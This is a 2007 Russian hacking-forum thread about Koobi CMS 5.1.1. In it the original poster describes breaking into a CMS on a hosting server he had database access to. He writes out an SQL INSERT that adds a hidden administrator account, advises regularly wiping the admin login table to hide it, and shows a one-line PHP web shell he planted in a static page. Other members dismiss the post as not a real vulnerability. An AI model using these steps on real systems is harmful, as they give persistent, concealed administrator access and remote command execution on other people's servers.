ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Добавление скрытого пользователя в Koobi CMS 5.1.1
  #1  
Старый 11.12.2007, 16:10
Аватар для otmorozok428
otmorozok428
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623

Репутация: 415
По умолчанию Добавление скрытого пользователя в Koobi CMS 5.1.1

Недавно обнаружил прикольную фичу с добавлением пользователя. В общем, у меня был доступ к базе данных, а ля phpMyAdmin, но в админку CMS проникнуть никак не получалось, поскольку админский пароль был пошифрован md5 и никак не брутился.

Решение было вполне естественным - я добавил в базу CMS Koobi, своего юзера с админскими правами

Цитата:
INSERT INTO koobi_user (uid, ugroup, uname, email, pass) VALUES (3, 1, "guest", "guest@gmail.com", "202cb962ac59075b964b07152d234b70");
Здесь uid - уникальный порядковый номер пользователя,
uname - имя пользователя,
ugroup равный 1, указывает на то, что юзер - член группы админов,
email используется для логина, а
pass - это md5-хеш нашего пароля (в данном случае "123").

Успешно залогинившись и решив полюбоваться на себя в списке пользователей - обнаружил там лишь легальных зарегистрированных юзеров. Попробовал найти себя через поиск, но тоже обломался.

Правда, есть и палевный момент - если зайти в меню, где отображаются группы пользователей, можно увидеть, что в группе "Администраторы" состоят целых 2 чела, тогда как отображается только 1. Кроме того, в таблице koobi_adminlogs отображаются логины ВСЕХ существующих админов, т.е. эту табу надо регулярно подчищать.

После этого, я со спокойной совестью зайшёл в пункт "Статические страницы/Страницы/Редактировать" и добавил свою скромную лепту в текст какой-то статьи. Вот, так
{php}system($_GET['cmd']);{/php}
.
 
Ответить с цитированием

  #2  
Старый 11.12.2007, 16:22
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

А вчем суть то, то что ты умеешь составлять SQL выражения? а насчет скрытности, я Koobi CMS не видел, но могу предположить, что за отображение отвечает другая табличка или вобще там какоето кеширование происходит, скорее всего первое
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #3  
Старый 11.12.2007, 16:41
Аватар для otmorozok428
otmorozok428
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623

Репутация: 415
По умолчанию

Суть в том, что ты имеешь невидимого пользователя в CMS с админскими правами. Согласись, Scipio, не всегда удобно работать с базой данных напрямую...
 
Ответить с цитированием

  #4  
Старый 11.12.2007, 16:47
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Вобще когда что нить взламываешь очень много неудобных вещей бывает, в твоем случае все довольно удобно сложилось, плюсенги я тебе за оформление поставлю, но суть твоего поста сводится к тому:"посмотрите как я умею", имхо пользы никакой
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #5  
Старый 11.12.2007, 16:54
Аватар для otmorozok428
otmorozok428
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623

Репутация: 415
По умолчанию

Собственно, это хостинг был Там было очень много неудобных phpMyAdminоv и надо было как-то в админки попасть... Действительно, очень удобно получилось
 
Ответить с цитированием

  #6  
Старый 11.12.2007, 16:55
Аватар для Constantine
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Это не уязвимость Cms имхо.
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #7  
Старый 11.12.2007, 18:19
Аватар для The_HuliGun
The_HuliGun
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663

Репутация: 240
Отправить сообщение для The_HuliGun с помощью ICQ
По умолчанию

Это вообще не уязвимость.
 
Ответить с цитированием

  #8  
Старый 11.12.2007, 18:22
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

это называется я научился основам Sql
 
Ответить с цитированием

  #9  
Старый 11.12.2007, 18:37
Аватар для otmorozok428
otmorozok428
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623

Репутация: 415
По умолчанию

Налетели гуру и порвали в клочья
Ну не уязвимость - просто интересный факт...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
CMS vs "изготовление на коленках" vadim_samoilov Чужие Статьи 8 19.08.2008 02:10



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ